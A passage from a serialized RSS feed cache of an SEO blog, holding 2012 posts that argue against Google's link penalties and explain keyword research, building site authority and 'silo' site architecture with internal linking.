will come to terms with this and act accordingly (and ignore Google).</p>\n<h3>The Pervasive Threat of Google Penalties</h3>\n<p>Recently Google informed untold numbers of webmasters that they were in <a href=\"http://next.inman.com/2012/04/google-evolves-are-you-ready/\">violation of their terms of service</a> for unnatural link activity. Needless to say, the fear of loss is a great motivator. When people are told to conform, most will to avoid going against the current of the status quo.</p>\n<p>However, the audacity that webmasters should conform to a terms of service (considering they didn&#8217;t opt in in the first place) based on Google&#8217;s limitation on determining the value of the link graph (paid link, intentional link, unintenional link, etc.) is preposterous. It&#8217;s not like anyone in their index ever received a request asking if it was ok to crawl your content and include it in their index?</p>\n<p>Does CNN, New York Times, USA today or other massive authority sites add rel=”nofollow” tags to every outbound link or risk getting deindexed? No, they do not… Then why should you have to?</p>\n<p>The fact is that websites with that extent of authority simply don’t need Google (because they already have an established brand) and users will go directly to their website instead of using Google as an intermediary (which is essentially all they are).</p>\n<p>And how <strong>“relevant”</strong> would Google be if a user typed in CNN in Google and couldn’t find CNN (or any large brand for that matter), which makes brands essentially immune to being banned from their search results.</p>\n<p>Yet, for small businesses, entrepreneurs, affiliates and others forced to compete daily in search engines to funnel traffic to thrive and survive are constantly pummeled by the vague terms of service which essentially means you cannot promote your website (unless it’s done according to Google’s promotional policy).</p>\n<h3>Google&#8217;s Stance on Links is Dated</h3>\n<p>Sorry, the last time I checked links were not exclusively designed to manipulate PageRank, <strong>links are just links</strong>, the are simply how people move <em>from page to page and website to website</em>. Just as freedom of speech exists, the freedom to link to <strong>who you like when you like</strong> exists in the same vein.</p>\n<p>The only difference (mind you) is intent and links are either designed to deliver visitors from Page A to Page B or to promote – it’s that simple. And<strong> people are going to promote their business by necessity in order to create a profit</strong> so, I don’t see links going away any time soon, so, Google you will simply have to adapt (and stop penalizing webmasters) or they will simply move on to other traffic funnels.</p>\n<p>The point I am making is, if Google were losing money due to their massive operation, do you think they would have the time, energy or resources to keep <strong>“shaking things up”</strong> in the organic search results in the name of search quality?</p>\n<p>Would they have time to ban countless advertisers (since they collectively are not worth the time to service compared to fortune 500 and up clientele)? – I think not.</p>\n<h3>Is Google&#8217; Greatest Fear Competition or Complacency?</h3>\n<p>With Facebook (the social giant) and Apple (the mobile giant)  both considering entering the search engine space, Google could potentially have some SERIOUS competition ahead (unlike Yahoo or Bing) and which suggests that…</p>\n<p>Google biggest fear is:</p>\n<p>1)      They will become obsolete as the preferred organic search engine and lose their monopoly (and profit).</p>\n<p>2)      Paid search will fail to deliver (since organic search is no longer “the cats meow” for disgruntled users) and the organic traffic base will diminish.</p>\n<p>3)      The curve will change (which is the most likely) meaning that new technologies, platforms, methods and/or solutions will emerge and people will simply move on from typing keywords in to search engines and use alternative methods such as apps, HTML5 or other alternatives to have media or commerce delivered on demand.</p>\n<p>The cycle of emerging innovation (from BBS, to directories, to search engines) followed by user adaptation which now borders on user complacency has already reached the point of consolidation.</p>\n<p>This implies that the cycle is ripe for change and a new potential curve (such as <a href=\"http://www.apple.com/iphone/features/siri.html\">Apples Siri</a>) or other alternatives to search could make the previous achievement obsolete (e.g. pagers, cassette tapes, VCR’s, the Yellow Pages).</p>\n<p>However, at the time (back in the day) few were looking past the phase of user complacency and would still be using Pagers, cassette tapes, VCR’s, etc. if new innovations and curves had not usurped them, now making them obsolete.</p>\n<p>While most people didn’t know (or care) what a search engine was 10 years ago, fast forward 10 years and they may not even be able to remember.</p>\n<p>Keep in mind, the market is fickle and here today gone tomorrow can happen faster with the acceleration of communication and new emerging technologies.</p>\n<h3>The Take Away to Remeber</h3>\n<p>1)      The very data in <strong>Google&#8217;s index</strong> that they attempt to police and enforce <strong>does not belong to them</strong>, it belongs to the others (those who wrote it) and the web at large who are generous enough to share. Google does not create the content their index, you do and <strong>how you promote it</strong> is up to you.</p>\n<p>2)      The web is bigger than Google and you decide Google’s fate every time you search on their platform or choose another search engine you cast your vote. There are thousands of traffic funnels to drive visitors to your websites aside from search engines (investigate them for viability to your business).</p>\n<p>3)      Google telling people to jump through hoops (in fear of a ranking penalty or removal from <strong>their index</strong>) is a Pandora’s Box they should leave behind (or they might be left behind on the next emerging curve from those same banned/penalized users).</p>\n<p>In closing,<strong> Google’s greatest fear is you not using them </strong>and while their business model is brilliant, they&#8217;re the most successful company in history to profit from (1) using content created from other websites via crawling and indexing technology (2) create a synergistic advertising model <em>as an accessory</em> to their organic search results and (3)  getting paid to send traffic <em>away from their own site</em> as an authoritative intermediary – this curve, put simply, has  its limitations, particularly, if any of the aforementioned metrics change, (such as Google having to ask permission to crawl your data).</p>\n<p>Fortunately for us (based on previous experience), we know that consumers are fickle and at any time they could opt-out and frequent other websites which have more emotional, funcional or curb appeal than Google. Google started as one website and can potentially be reduced to that <em>if people choose not to use it</em>.</p>\n<p>This means you, the users hold the key to just how much power or control you wish to allow it to have over you or your business.</p>\n<p>Feel free to share your thoughts below…</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=c3NjkKxSVOY:arivhTVcDC4:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/c3NjkKxSVOY\" height=\"1\" width=\"1\"/>\";}i:16;a:12:{s:5:\"title\";s:58:\"SEO Video: Qualifying Keywords Through Competitor Research\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/gvVzgFPausA/\";s:8:\"category\";s:85:\"SEO VideosCompetitor Keyword ResearchQualifying Keywords with competitor dataSEM Rush\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Mon, 20 Feb 2012 15:02:11 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9110\";s:7:\"content\";a:1:{s:7:\"encoded\";s:1306:\"<p>Searching for quick competitor research methods to determine if a keyword is a worthy target for an SEO campaign? Watch this video and learn how to use your competitors to qualify which phrases are worthwhile using SEM Rush and other useful SEO tools.</p>\n<p><object width=\"480\" height=\"360\"><param name=\"movie\" value=\"http://www.youtube.com/v/jIpEKnTG3Kc?version=3&amp;hl=en_US\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/jIpEKnTG3Kc?version=3&amp;hl=en_US\" type=\"application/x-shockwave-flash\" width=\"480\" height=\"360\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>Stay tuned for more SEO tips and tactics from SEO Design Solutions and the upcoming release of our new WP Ultimate Theme and WP Silo Builder plugin.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=gvVzgFPausA:LPoUpSys_TQ:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/gvVzgFPausA\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:324:\"Searching for quick competitor research methods to determine if a keyword is a worthy target for an SEO campaign? Watch this video and learn how to use your competitors to qualify which phrases are worthwhile using SEM Rush and other useful SEO tools. Stay tuned for more SEO tips and tactics from SEO Design Solutions [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"5\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:108:\"http://www.seodesignsolutions.com/blog/seo-videos/seo-video-qualifying-keywords-through-competitor-research/\";}s:7:\"summary\";s:324:\"Searching for quick competitor research methods to determine if a keyword is a worthy target for an SEO campaign? Watch this video and learn how to use your competitors to qualify which phrases are worthwhile using SEM Rush and other useful SEO tools. Stay tuned for more SEO tips and tactics from SEO Design Solutions [...]\";s:12:\"atom_content\";s:1306:\"<p>Searching for quick competitor research methods to determine if a keyword is a worthy target for an SEO campaign? Watch this video and learn how to use your competitors to qualify which phrases are worthwhile using SEM Rush and other useful SEO tools.</p>\n<p><object width=\"480\" height=\"360\"><param name=\"movie\" value=\"http://www.youtube.com/v/jIpEKnTG3Kc?version=3&amp;hl=en_US\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/jIpEKnTG3Kc?version=3&amp;hl=en_US\" type=\"application/x-shockwave-flash\" width=\"480\" height=\"360\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>Stay tuned for more SEO tips and tactics from SEO Design Solutions and the upcoming release of our new WP Ultimate Theme and WP Silo Builder plugin.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=gvVzgFPausA:LPoUpSys_TQ:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/gvVzgFPausA\" height=\"1\" width=\"1\"/>\";}i:17;a:12:{s:5:\"title\";s:38:\"Full-Bodied SEO: Looking Past Keywords\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/xSnyEisWj14/\";s:8:\"category\";s:97:\"Search Engine Optimizationdeveloping on page authorityDomain AuthoritySEOtranscending SEO metrics\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 15 Feb 2012 21:21:30 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9105\";s:7:\"content\";a:1:{s:7:\"encoded\";s:7333:\"<p>Just like degusting a fine wine to appreciate its full-bodied flavor, don&#8217;t omit the chronology that it’s <strong>the process of the grapes aging</strong> combined with a semblance of subordinate processes that merge a plethora of complex layers into simplified notes to cultivate a delectable, yet exquisite fine wine. In parallel, SEO is quite similar.</p>\n<div id=\"attachment_9104\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/full-bodied-seo-looking-past-keywords/\"><img class=\"size-full wp-image-9104\" title=\"seo-is-like-fine-wine\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/02/seo-is-like-fine-wine.jpg\" alt=\"\" width=\"400\" height=\"424\" /></a><p class=\"wp-caption-text\">Like a fine wine, authority occurs over time</p></div>\n<p>While most blindly assume that SEO is about keywords (which is partially true), real SEO is involves grasping the underlying metrics and logic that search engines use to determine which websites are authoritative and which others are not.<span id=\"more-9105\"></span></p>\n<p>The real goal of SEO is to create authority; and the faster you accomplish domain or page level authority for any website, the faster keyword conquests are realized and achieved. The extent of the authority of a website, determines how long (or short) a keyword conquest becomes.</p>\n<p>If your website has exceeded the necessary tipping point (meaning it has enough <a href=\"http://www.miislita.com/information-retrieval-tutorial/cosine-similarity-tutorial.html\">term weight</a>, <a href=\"http://www.seoengine.com/link-flow.htm\">link-flow</a> from supporting anchor text and pages) and nests the proper on page signals, then that website is a candidate for occupying the top 1000 seed pages in Google’s index otherwise dubbed &#8220;<a href=\"http://www.seodesignsolutions.com/blog/seo-basics/seizing-the-seo-window-of-opportunity/\">the authority set</a>&#8220;. In essence, the more weight the pages have, the more pages from that domain can be included as seeds in the organic search landscape.</p>\n<p>While other pages are crawled, only the top 1000 matter and from those 1000 pages there are typically a handful of domains which are considered dominant within the scope of that topic.</p>\n<p>Those websites are considered <strong>“the authority set”</strong> and once any page from any website has reached the apex of a topic and breaches the authority set, it now becomes the model that Google and other search engines compare other pages to (to ascertain relevance, validity and rankings).</p>\n<p>Your objective is to (a) model your data (b) site architecture (c) internal linking structures (d) backlinks and (e) navigation schema to reinforce the topical scope of a page for (1) the primary phrase (2) parallel themes or categories (3) synonyms and sibling themes and (4) adjacent pages which could benefit from the link-flow or page level / theme /authority of that page.</p>\n<p>This in turn allows you to funnel PageRank, trust and authority to any area of your website with the ideal anchor text (at will) which makes your website less dependent on off-site linking structures to achieve <a href=\"http://www.seodesignsolutions.com/blog/seo/applied-seo-pivotal-seo-metrics/\">buoyant ranking</a> factor.</p>\n<p>For example, we have built websites using this technique and created PR5 sites from brand new domain (which achieved first page results in 30-45 days time for competitive keywords up to 7,500,000 competing pages using less than 50 backlinks off-site.</p>\n<p>Similarly, the 70+ of the 95 internal pages also sprouted page rank (PR3,PR4 and PR5) which in turn funneled that <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-tips-to-transfer-latent-ranking-factors/\">ranking factor</a> to other select pages creating an unparalleled <a href=\"http://www.seodesignsolutions.com/blog/seo/the-seo-tipping-point/\">tipping point</a> like a tube Taurus folding in on itself) to propel even more rankings as a result, which leads to my next point.</p>\n<p>Rankings can be observed from two perspectives (similar to the haves and have nots) and while the ultimate goal or <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-tips-to-optimize-a-new-website/\">optimizing your website</a> stems from the desire to reach the top 3 spots (the traffic band) getting there is ultimately determined by how authoritative your page is and the website that supports it.</p>\n<p>Allow me to elaborate.</p>\n<p>Every page of your website (if optimal) represents an opportunity to rank that page and dozens more when combined with <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-best-practices-getting-started/\">SEO best practices</a>, such as:</p>\n<ul>\n<li>Relevant meta data (for every page).</li>\n<li>A mirrored keyword-rich <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-url-structure/\">URL structure</a> for the primary market and semantic focus of the page.</li>\n<li>Proper H1 use to reflect the primary keyword</li>\n<li>Sufficient inclusion of theme relevant keywords for the primary and secondary keyword shingles (groups of words).</li>\n<li>Awareness of link-flow limitations (not having 100+links on a page via navigation and contextual areas to bleed ranking factor).</li>\n<li>Use of optimal internal linking</li>\n<li>Proper site architecture that reflects a <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/website-silo-architecture-seo-siloing-simplified/\">natural data hierarchy</a> (with more competitive keywords higher up in the hierarchy and less competitive categories and mid-tail and long-tail keyword variations supporting the theme).</li>\n<li>Proper grammar and conversion cues</li>\n<li>The proper proportion of themed inbound links from qualified sources to the home page and deep links to various supporting categories and landing pages (with their primary shingles and / or synonyms).</li>\n</ul>\n<p>The takeaway here is, cultivation of authority is the goal of SEO. Once that authority has been realized, it must be leveraged to propel entire clusters of keywords into a prominent search engine position (with minimal backlinks) from using the overlapping nodes of relevance and page level trust and relevance score it has accumulated.</p>\n<p>The extent of the authority depends on (a) the freshness and introduction of new / <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-theme-and-silo-your-wordpress-blog/\">supporting content</a> (b) the volume of content (c) the age of the domain (d) the relevancy or the internal link structure and most importantly (e) the time to authority factor (like a fine wine aging over time) that represents the priceless / more elusive ranking factor to distill in reverse or from the perspective of a competitor to emulate.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=xSnyEisWj14:BvmIoZiDFbA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/xSnyEisWj14\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:357:\"Just like degusting a fine wine to appreciate its full-bodied flavor, don&#8217;t omit the chronology that it’s the process of the grapes aging combined with a semblance of subordinate processes that merge a plethora of complex layers into simplified notes to cultivate a delectable, yet exquisite fine wine. In parallel, SEO is quite similar. While [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"3\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:104:\"http://www.seodesignsolutions.com/blog/search-engine-optimization/full-bodied-seo-looking-past-keywords/\";}s:7:\"summary\";s:357:\"Just like degusting a fine wine to appreciate its full-bodied flavor, don&#8217;t omit the chronology that it’s the process of the grapes aging combined with a semblance of subordinate processes that merge a plethora of complex layers into simplified notes to cultivate a delectable, yet exquisite fine wine. In parallel, SEO is quite similar. While [...]\";s:12:\"atom_content\";s:7333:\"<p>Just like degusting a fine wine to appreciate its full-bodied flavor, don&#8217;t omit the chronology that it’s <strong>the process of the grapes aging</strong> combined with a semblance of subordinate processes that merge a plethora of complex layers into simplified notes to cultivate a delectable, yet exquisite fine wine. In parallel, SEO is quite similar.</p>\n<div id=\"attachment_9104\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/full-bodied-seo-looking-past-keywords/\"><img class=\"size-full wp-image-9104\" title=\"seo-is-like-fine-wine\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/02/seo-is-like-fine-wine.jpg\" alt=\"\" width=\"400\" height=\"424\" /></a><p class=\"wp-caption-text\">Like a fine wine, authority occurs over time</p></div>\n<p>While most blindly assume that SEO is about keywords (which is partially true), real SEO is involves grasping the underlying metrics and logic that search engines use to determine which websites are authoritative and which others are not.<span id=\"more-9105\"></span></p>\n<p>The real goal of SEO is to create authority; and the faster you accomplish domain or page level authority for any website, the faster keyword conquests are realized and achieved. The extent of the authority of a website, determines how long (or short) a keyword conquest becomes.</p>\n<p>If your website has exceeded the necessary tipping point (meaning it has enough <a href=\"http://www.miislita.com/information-retrieval-tutorial/cosine-similarity-tutorial.html\">term weight</a>, <a href=\"http://www.seoengine.com/link-flow.htm\">link-flow</a> from supporting anchor text and pages) and nests the proper on page signals, then that website is a candidate for occupying the top 1000 seed pages in Google’s index otherwise dubbed &#8220;<a href=\"http://www.seodesignsolutions.com/blog/seo-basics/seizing-the-seo-window-of-opportunity/\">the authority set</a>&#8220;. In essence, the more weight the pages have, the more pages from that domain can be included as seeds in the organic search landscape.</p>\n<p>While other pages are crawled, only the top 1000 matter and from those 1000 pages there are typically a handful of domains which are considered dominant within the scope of that topic.</p>\n<p>Those websites are considered <strong>“the authority set”</strong> and once any page from any website has reached the apex of a topic and breaches the authority set, it now becomes the model that Google and other search engines compare other pages to (to ascertain relevance, validity and rankings).</p>\n<p>Your objective is to (a) model your data (b) site architecture (c) internal linking structures (d) backlinks and (e) navigation schema to reinforce the topical scope of a page for (1) the primary phrase (2) parallel themes or categories (3) synonyms and sibling themes and (4) adjacent pages which could benefit from the link-flow or page level / theme /authority of that page.</p>\n<p>This in turn allows you to funnel PageRank, trust and authority to any area of your website with the ideal anchor text (at will) which makes your website less dependent on off-site linking structures to achieve <a href=\"http://www.seodesignsolutions.com/blog/seo/applied-seo-pivotal-seo-metrics/\">buoyant ranking</a> factor.</p>\n<p>For example, we have built websites using this technique and created PR5 sites from brand new domain (which achieved first page results in 30-45 days time for competitive keywords up to 7,500,000 competing pages using less than 50 backlinks off-site.</p>\n<p>Similarly, the 70+ of the 95 internal pages also sprouted page rank (PR3,PR4 and PR5) which in turn funneled that <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-tips-to-transfer-latent-ranking-factors/\">ranking factor</a> to other select pages creating an unparalleled <a href=\"http://www.seodesignsolutions.com/blog/seo/the-seo-tipping-point/\">tipping point</a> like a tube Taurus folding in on itself) to propel even more rankings as a result, which leads to my next point.</p>\n<p>Rankings can be observed from two perspectives (similar to the haves and have nots) and while the ultimate goal or <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-tips-to-optimize-a-new-website/\">optimizing your website</a> stems from the desire to reach the top 3 spots (the traffic band) getting there is ultimately determined by how authoritative your page is and the website that supports it.</p>\n<p>Allow me to elaborate.</p>\n<p>Every page of your website (if optimal) represents an opportunity to rank that page and dozens more when combined with <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-best-practices-getting-started/\">SEO best practices</a>, such as:</p>\n<ul>\n<li>Relevant meta data (for every page).</li>\n<li>A mirrored keyword-rich <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-url-structure/\">URL structure</a> for the primary market and semantic focus of the page.</li>\n<li>Proper H1 use to reflect the primary keyword</li>\n<li>Sufficient inclusion of theme relevant keywords for the primary and secondary keyword shingles (groups of words).</li>\n<li>Awareness of link-flow limitations (not having 100+links on a page via navigation and contextual areas to bleed ranking factor).</li>\n<li>Use of optimal internal linking</li>\n<li>Proper site architecture that reflects a <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/website-silo-architecture-seo-siloing-simplified/\">natural data hierarchy</a> (with more competitive keywords higher up in the hierarchy and less competitive categories and mid-tail and long-tail keyword variations supporting the theme).</li>\n<li>Proper grammar and conversion cues</li>\n<li>The proper proportion of themed inbound links from qualified sources to the home page and deep links to various supporting categories and landing pages (with their primary shingles and / or synonyms).</li>\n</ul>\n<p>The takeaway here is, cultivation of authority is the goal of SEO. Once that authority has been realized, it must be leveraged to propel entire clusters of keywords into a prominent search engine position (with minimal backlinks) from using the overlapping nodes of relevance and page level trust and relevance score it has accumulated.</p>\n<p>The extent of the authority depends on (a) the freshness and introduction of new / <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-theme-and-silo-your-wordpress-blog/\">supporting content</a> (b) the volume of content (c) the age of the domain (d) the relevancy or the internal link structure and most importantly (e) the time to authority factor (like a fine wine aging over time) that represents the priceless / more elusive ranking factor to distill in reverse or from the perspective of a competitor to emulate.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=xSnyEisWj14:BvmIoZiDFbA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/xSnyEisWj14\" height=\"1\" width=\"1\"/>\";}i:18;a:12:{s:5:\"title\";s:49:\"Website Silo Architecture: SEO Siloing Simplified\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/zVJma9RiWtY/\";s:8:\"category\";s:13:\"SEO Resources\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Fri, 20 Jan 2012 15:27:02 PST\";s:4:\"guid\";s:102:\"http://www.seodesignsolutions.com/blog/seo-resources/website-silo-architecture-seo-siloing-simplified/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:13084:\"<p>To draw on a visual analogy, most websites are like the image of mixed  fruit below (which makes it difficult for a search engine to determine  the topicality or relevance of the website (or more importantly the  page) when trying to determine what to rank that page for or why.</p>\n<div id=\"attachment_9094\" class=\"wp-caption aligncenter\" style=\"width: 293px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-resources/website-silo-architecture-seo-siloing-simplified/\"><img class=\"size-full wp-image-9094\" title=\"mixed-fruit\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/01/mixed-fruit.jpg\" alt=\"Mixed Fruit\" width=\"283\" height=\"424\" /></a><p class=\"wp-caption-text\">Most Websites Are Structured Like The Image Above</p></div>\n<p>Website silo architecture is the process of implementing a structure whereby each topic is housed in it&#8217;s own mini-site within the site and the internal linking pushes ranking factor back up to the primary / topic page otherwise dubbed the &#8220;silo landing page&#8221;.</p>\n<p>While SEO is simpler than most so called &#8220;experts&#8221; imply, it&#8217;s like the difference between a short order cook and a chef, they both cook food and often use the same ingredients, but it’s how they use them that matters.<span id=\"more-9096\"></span></p>\n<p>Similarly, when you dial in the appropriate on page and off page SEO using website silo architecture, then regardless of whether your website is aged or new, a website which previously had zero presence can instantly sprout wings and start ascending the SERPs (search engine result pages) to the top 5 results.</p>\n<p>On the contrary, if your execution lacks the proper structure for the granular ingredients, then lackluster results are sure to follow. You have to (a) understand your topic (b) create a top down model (starting from broad phrases to specific categories and supporting content) and (c) put each thing in its proper place.</p>\n<p>So, what is the proper way to structure a result-driven SEO campaign? Here’s our take on five fundamental methods which we have deemed evergreen SEO principles we’ve used for years to create proven results.</p>\n<ol>\n<li>Proper Title and URL structure.</li>\n<li>Proper H1 Use (to mirror title and URL).</li>\n<li>Proper site structure (cascading tiers of relevance).</li>\n<li>Theme relevant internal linking.</li>\n<li>The proper amount of link flow (to reach and exceed the tipping point).</li>\n</ol>\n<h3>Proper Title and URL Structure</h3>\n<p>By using specific shingles (groups of words) in the title (with prominent keywords first) you send the strongest SEO signal to search engines (as they attempt to determine the topic of your page).</p>\n<p>The more diffused (or verbose) a title is, the less effective it is for SEO. For example, if I am trying to rank for <strong>insurance rates</strong>, then those shingles should be the sole or primary page title as well as the URL structure should follow suit such as domain.com/insurance-rates/</p>\n<p>While conversion cues must be balanced with SEO, it is possible to get the best of both worlds through using synonyms or plural variations in the title while keeping it succinct and relevant.</p>\n<p>For example, a title such as -  Insurance Rates: Find the Best Rate and Affordable Prices! (<strong>which also includes keywords like best, prices, rate and rates</strong>) in case consumers use a long-tail query, then your landing page can rank for all potential variations of any of the shingles.</p>\n<h3>Proper H1 Usage</h3>\n<p>Using the proper H1 tag (header tag) is a common tried and true SEO technique; if you use <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-theme-and-silo-your-wordpress-blog/\">WordPress</a> then your permalink (page title) can easily be switched to your H1 tag by simply changing your style sheet.</p>\n<p>If you are using other CMS (<a href=\"http://www.seodesignsolutions.com/blog/seo-resources/creating-hybrid-staging-areas-for-legacy-cms-and-non-seo-friendly-crm-platforms/\">content management systems</a>) or static html pages, similarly, the suggestion to mirror your title and URL structure with the primary keyword is ideal. Such as the example above, the H1 tag should be <strong>“Insurance Rates”</strong>.</p>\n<p>One little trick is, you can also make the H1 (Header Tag / Text) a link and link that either to the home page or pass that ranking factor on to another page you intend to rank. If you are properly theming your website using website silo architecture, then it is possible to feed the primary silo landing page from your category pages this way (to page rank flows up and back to the primary landing page) from nested pages that support the category.</p>\n<h3>Proper Site Structure</h3>\n<p>Think of your website in tiers, those tier represent the natural data hierarchy of your website. Starting with your home page (in the root folder), this is tier 1 and the starting point for your SEO.</p>\n<p>The root folder is the natural destination for your most prominent pages and should house your primary landing pages in the first tier. This is because eventually, all the nested pages will pass their link-flow back to the root and you can scale laterally with multiple silo landing pages for competitive keywords and markets.</p>\n<p>Here is a visual aid to assist provided by <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">Network Empire</a>.</p>\n<div id=\"attachment_9095\" class=\"wp-caption aligncenter\" style=\"width: 325px\"><img class=\"size-full wp-image-9095\" title=\"sample-silo\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/01/sample-silo.jpg\" alt=\"\" width=\"315\" height=\"369\" /><p class=\"wp-caption-text\">Sample of Properly Siloed Website</p></div>\n<p>Using the example from above, domain.com/insurance-rates  – would be my Silo Landing Page, i.e. the keyword I want to rank for. Now, by adding relevant categories and supporting articles, you can give any landing /silo page wings in the SERPs (search engine result pages).</p>\n<h3>Theme-Relevant Internal Linking</h3>\n<p>To implement theme-relevant internal linking, It is linked from my homepage with the keyword “insurance rates” as the anchor text to reinforce it. I would also use contextual anchor text links to any other silo landing pages that need tier one link flow to support them.</p>\n<p>By writing a contextual article and linking to the silo landing pages from the homepage, any link juice my homepage receives, get ring-fenced and passed along to the on page editorial links (the silo landing pages / preferred keyword landing pages) by design.</p>\n<p>The next tier is your category pages; these will become the hub page that sites on tier 2 one folder away from the root.</p>\n<p>The category page and primary landing page share a similar URL structure, but the primary landing page is the grandparent and the category parent, next up the posts or supporting articles are the children of the parent/category page.</p>\n<p>For example (to support my silo landing page, I would create a category called <strong>“affordable insurance rates”</strong> since it is thematically relevant to the silo landing page.</p>\n<p>On that page, if I wanted to use the H1 tag to link back to the primary landing page with <strong>“insurance rates”</strong> it would pass along that link flow, when I add the tier 3 pages (blog posts/products or articles) depending on the type of site you are building.</p>\n<p>Domain.com/insurance-rates/affordable-insurance-rates/ &#8211; whereby the silo landing page becomes the grandparent, the category the parent and the post/supporting article becomes the child.</p>\n<p>The third tier would be used for adding supporting content under the nested <strong>theme relevant category</strong> which has the primary purpose of acting as a controlled portion of the website to administer all content that contains the primary or secondary keywords associated with the primary silo landing page.</p>\n<h3>Adding the Proper Amount of Link-Flow</h3>\n<p>Link flow is created from linking from page to page with the appropriate anchor text. <a href=\"http://www.seodesignsolutions.com/blog/seo-consulting/which-links-pass-the-most-weight-in-search-engines/\">Link-flow</a> also takes the number of inbound and outbound links in addition to the strength and thematic relevance of the links. Siloing passes maximum link flow by capping contextual links (from only linking within the silo) and each page is linked via navigation by virtue of the category.</p>\n<p>As an example, if I added supporting articles to the affordable insurance rates category they would also be theme related and contain a contextual link that linked back to my category page, which in turn links to my silo landing page (primary landing page in the root).</p>\n<p>I would add pages like:</p>\n<ul>\n<li>Best insurance rates</li>\n<li>Save money on insurance</li>\n<li>Compare insurance rates</li>\n</ul>\n<p>And each would become a post attached to the category, such as: domain.com/insurance-rates/affordable-insurance-rates/compare-insurance-rates</p>\n<p>And have navigational links to everything in that category, while linking back to the silo landing page with the contextual keyword it is trying to rank for “insurance rates”.</p>\n<p>The benefit to this 